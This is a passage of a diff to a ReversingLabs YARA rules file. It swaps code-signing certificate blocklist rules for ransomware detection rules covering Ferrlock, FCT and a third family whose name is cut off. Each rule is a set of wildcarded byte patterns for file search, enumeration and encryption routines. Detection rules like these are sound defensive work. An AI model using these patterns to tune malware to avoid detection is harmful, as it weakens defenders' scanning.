+            ?? ?? ?? 48 89 05 ?? ?? ?? ?? 33 DB 48 8B 05 ?? ?? ?? ?? 45 33 C9 48 89 05 ?? ?? ??
+            ?? 45 33 C0 48 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 C7
+        }
+		$encrypt_files_p2 = {
+            C1 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48
+            8D 85 ?? ?? ?? ?? 4C 89 A4 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D
+            25 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 45 33 C9 45 33 C0 4C 89 64 24 ?? 4C 89 BC 24
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8D 2D ?? ?? ?? ?? 83
+            F8 ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 89 5C 24 ??
+            E8 ?? ?? ?? ?? 85 C0 78 ?? 4C 63 C8 4C 8D 85 ?? ?? ?? ?? 48 8D 44 24 ?? 4D 2B C1 48
+            89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 4C 89 64 24 ?? E8 ?? ?? ?? ??
+            49 8B CD FF 15 ?? ?? ?? ?? 44 8B C0 89 05 ?? ?? ?? ?? B8 ?? ?? ?? ?? 41 F7 E8 C1 FA
+            ?? 8B CA C1 E9 ?? 03 D1 69 CA ?? ?? ?? ?? 44 3B C1 74 ?? FF C2 4C 8D 3D ?? ?? ?? ??
+            85 D2 0F 8E ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 49 8B DD 4C 89 B4 24 ?? ?? ?? ?? 49
+        }
+		$encrypt_files_p3 = {
+            8B FF 44 8B F2 0F 1F 00 48 8B 0D ?? ?? ?? ?? 8B 91 ?? ?? ?? ?? 85 D2 74 ?? 83 FA ??
+            75 ?? 48 89 7C 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 C7
+            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 89 7C 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 89
+            5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C7 ??
+            ?? ?? ?? 48 81 C3 ?? ?? ?? ?? 49 83 EE ?? 75 ?? 4C 8B B4 24 ?? ?? ?? ?? 33 DB 48 8B
+            BC 24 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 FF C6 41 80 3C 34 ?? 75 ?? 48 8B 8D ?? ?? ??
+            ?? 48 8D 15 ?? ?? ?? ?? 89 74 24 ?? 41 B9 ?? ?? ?? ?? 45 33 C0 4C 89 64 24 ?? FF 15
+            ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 45 33 C0 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? EB ?? 48 8B 8D ?? ?? ?? ?? 48
+            8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D 3D ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 45 33
+            C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 49 8B CC FF
+            15 ?? ?? ?? ?? 49 8B D4 48 8D 0D ?? ?? ?? ?? FF C0 4C 63 C0 E8 ?? ?? ?? ?? 48 8B 05
+            ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ??
+            ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ?? 48 85 C0 74 ?? 48 8B 0D ?? ??
+            ?? ?? FF 50 ?? 48 8B 05 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 33 D2 44 8D 42 ?? FF D0 48
+            8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 48 63 85 ?? ?? ?? ?? 48 3D ??
+            ?? ?? ?? 73 ?? 0F 1F 00 48 63 85 ?? ?? ?? ?? 42 C6 04 28 ?? FF 85 ?? ?? ?? ?? 48 63
+            85 ?? ?? ?? ?? 48 3D ?? ?? ?? ?? 72 ?? 4C 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
+            5E 5B 5D C3
+        }
+		$enum_procs = {
+            40 56 48 81 EC ?? ?? ?? ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 48 8B C8 48 8B F0 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 89 9C
+            24 ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D 2D ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ??
+            0F 1F 40 ?? 0F 1F 84 00 ?? ?? ?? ?? 33 DB 48 8B FD 66 66 66 0F 1F 84 00 ?? ?? 00 00
+            48 8B 0F 48 8D 54 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF C3 48 83 C7 ?? 83 FB ?? 72
+            ?? EB ?? 44 8B 44 24 ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? BA
+            ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48
+            8B CE FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ??
+            48 8B 9C 24 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5E C3
+        }
+		$enum_shares = {
+            48 83 EC ?? 33 D2 C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 4C
+            8B C9 48 89 44 24 ?? 8D 4A ?? 44 8D 42 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            48 89 5C 24 ?? 8B 5C 24 ?? 48 89 7C 24 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 48 8B 0D ??
+            ?? ?? ?? 4C 8D 43 ?? BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 48 8B
+            4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C0 48 8D 54 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 66 0F
+            1F 44 00 ?? 33 DB 39 5C 24 ?? 76 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8D 0C 5B 48 C1 E1 ??
+            48 03 CF F6 41 ?? ?? 74 ?? E8 ?? ?? ?? ?? EB ?? 48 8B 49 ?? E8 ?? ?? ?? ?? FF C3 3B
+            5C 24 ?? 72 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C7 48 8D 54 24 ?? FF 15 ?? ?? ??
+            ?? 85 C0 74 ?? 48 8B 0D ?? ?? ?? ?? 4C 8B C7 33 D2 FF 15 ?? ?? ?? ?? 48 8B 4C 24 ??
+            FF 15 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 5C 24 ?? 48 83 C4 ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Silvo LLC" and pe.signatures [ i ] . serial == "56:d5:76:a0:62:49:1e:a0:a5:87:7c:ed:41:82:03:a1" and 1596249885 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_shares ) and ( $enum_procs ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0Fcba260Df7Da602Ecf4D4D6Fc89D5Dd : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ferrlock : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Ferrlock ransomware."
 		author = "ReversingLabs"
-		id = "ce248602-1f28-5707-b921-640271176e7f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "745ce529-46d0-56ed-a8fa-b41b26b068f4"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4574-L4590"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4e9a3e516342820248ebf9b3605b8ce2dbf1d9b4255a5b74f7369dd2f1cdd9d8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Ferrlock.yara#L1-L131"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b94bc77489dbb74573813631009e605bc848e17995a0a512d08b194ee3020b75"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ferrlock"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
+            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ??
+            ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF
+            75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B
+            CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B
+            43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF
+            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
+            C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA
+            ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB
+        }
+		$search_files_p2 = {
+            80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56
+            1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
+            ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15
+            ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
+            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
+            80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0
+            8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
+        }
+		$enum_rsrc = {
+            6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 8D 4D ?? 83 4D ?? ?? 51 50 6A
+            ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75
+            ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? EB ?? 33 DB 39 5D ?? 7E ??
+            8D 7E ?? F7 47 ?? ?? ?? ?? ?? 74 ?? 8D 47 ?? 89 45 ?? 8B 45 ?? 8B 00 8B 48 ?? 85 C9
+            74 ?? 8B 01 8D 55 ?? 52 FF 50 ?? EB ?? FF 37 8D 4D ?? E8 ?? ?? ?? ?? 83 65 ?? ?? 8D
+            45 ?? 50 8B 45 ?? 8B 48 ?? E8 ?? ?? ?? ?? 83 4D ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 43 83
+            C7 ?? 3B 5D ?? 7C ?? 83 4D ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 56 8D 45 ?? 50 FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? C2 ?? ?? E8 ?? ?? ?? ?? CC 55 8B EC 6A ?? 68 ?? ?? ?? ??
+            64 A1 ?? ?? ?? ?? 50 56 A1 ?? ?? ?? ?? 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 83
+            65 ?? ?? 8B 4E ?? 85 C9 74 ?? 8B 11 3B CE 0F 95 C0 0F B6 C0 50 FF 52 ?? 83 66 ?? ??
+            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B E5 5D C3
+        }
+		$create_test_file_p1 = {
+            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 33 DB 8D 55
+            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 59 8D 45 ?? C6 45 ?? ??
+            50 8D 4D ?? 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
+            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 CB ?? 8B 3D ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 65 ?? ??
+            8D 4D ?? 83 65 ?? ?? 56 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? FF 75 ?? 8B 45 ?? 2B 45
+            ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8B 55 ?? 8D 4D ?? 0F 43 45 ??
+            83 7D ?? ?? 0F 43 4D ?? 3B 55 ?? 75 ?? 52 50 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ??
+            ?? ?? ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ??
+            ?? 8D 4D ?? 0F 85 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 3B F7 0F 85 ?? ??
+            ?? ?? 83 7D ?? ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 43 45 ?? 33 C9 51 57
+        }
+		$create_test_file_p2 = {
+            6A ?? 51 51 68 ?? ?? ?? ?? 50 FF D6 3B C3 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
+            7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ??
+            33 C9 51 57 6A ?? 51 51 68 ?? ?? ?? ?? 50 FF D6 8B F8 3B FB 0F 84 ?? ?? ?? ?? 6A ??
+            57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 57 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 6A ?? 58 3B F0 0F 42 F0 03 F0 56 E8 ?? ?? ?? ?? 59 6A ?? 89 85
+            ?? ?? ?? ?? 8D 45 ?? 50 56 8B B5 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 75
+            ?? 57 FF 15 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D 55 ?? 50
+            8B CE E8 ?? ?? ?? ?? 59 59 33 DB 53 53 53 57 FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75
+            ?? 56 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F 43
+            4D ?? 83 7D ?? ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 8D 4D ??
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C3 E8 ??
+            ?? ?? ?? C3
+        }
+		$encrypt_files_p1 = {
+            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 F6 8D 4D ?? 89 B5
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 75 ?? 8D 4D ?? 68 ?? ?? ?? ?? 89 75 ?? 89 75 ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 7D ?? 8B D8 8B 45
+            ?? 0F 43 7D ?? 59 3B D8 77 ?? 85 DB 74 ?? 2B C3 40 03 C7 89 85 ?? ?? ?? ?? 2B C7 50
+            6A ?? 57 EB ?? 53 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 85 ?? ??
+            ?? ?? 46 2B C6 50 6A ?? 56 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? EB ?? 2B F7 EB
+            ?? 83 CE ?? 83 FE ?? 74 ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 50 51 56 8D 4D
+            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+        }
+		$encrypt_files_p2 = {
+            50 E8 ?? ?? ?? ?? 6A ?? 5F 89 7D ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ??
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 51 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? C6 45 ?? ?? 8B C8 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85
+            ?? ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 74 ?? 83 7D ?? ?? 8D
+            55 ?? FF 75 ?? 0F 43 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 8B 40 ?? 03 C8 8B 51
+            ?? 83 CA ?? 8B C2 0B C7 39 71 ?? 0F 44 D0 52 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 59 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gold Stroy SP Z O O" and pe.signatures [ i ] . serial == "0f:cb:a2:60:df:7d:a6:02:ec:f4:d4:d6:fc:89:d5:dd" and 1593388801 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_rsrc ) and ( all of ( $search_files_p* ) ) and ( all of ( $create_test_file_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4152169F22454Ed604D03555B7Afb175 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_FCT : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects FCT ransomware."
 		author = "ReversingLabs"
-		id = "e8975a1a-ac7c-5016-a206-de9ca7eea37f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "ea3d5514-d6f2-5fd0-9247-a3f6b920d8d9"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4592-L4608"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fbb2124b934c270739f564317526d5b23b996364372426485d7c994a83293866"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.FCT.yara#L1-L86"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b158ad56c92a926f7398a27b3576c259e39c9716ef192fa5944ce3cffdc6d7d0"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "FCT"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ??
+            ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 51 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 33 DB 8B 55 ?? 33 C9 8B 75
+            ?? 89 9D ?? ?? ?? ?? 85 D2 74 ?? 66 90 83 7D ?? ?? 8D 45 ?? 0F 43 C6 0F BE 04 08 41
+            03 D8 3B CA 72 ?? 89 9D ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B CF C7 45 ?? ?? ?? ?? ?? 33 C0
+            C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1
+            F9 51 57 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 75 ?? 8B C6 8B 55 ?? 2B C2 83 F8 ??
+            72 ?? 83 FE ?? 8D 45 ?? 8D 4A ?? BB ?? ?? ?? ?? 0F 43 45 ?? 89 4D ?? 66 89 1C 50 33
+            D2 66 89 14 48 EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ??
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51
+        }
+		$find_files_p2 = {
+            52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55
+            ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
+            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 FF 15 ?? ??
+            ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 55 ?? 8D 48 ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 52
+            ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83
+            FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
+            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D
+            ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 E8
+        }
+		$encrypt_files_p1 = {
+            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 57 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8B 75 ?? 8B C6 8B 55 ?? 2B C2 83 F8 ?? 72 ?? 83 FE ?? 8D 45 ?? 8D 4A ?? BB ?? ??
+            ?? ?? 0F 43 45 ?? 89 4D ?? 66 89 1C 50 33 D2 66 89 14 48 EB ?? 6A ?? 68 ?? ?? ?? ??
+            C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 8B 5D ?? 2B CA 8B 55 ?? 8B C3 D1 F9 2B
+            C2 3B C8 77 ?? 83 FB ?? 8D 04 09 50 8D 75 ?? 0F 43 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 3C
+            0A 89 7D ?? 8D 04 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 8D 85 ??
+            ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 81 BD
+            ?? ?? ?? ?? ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68
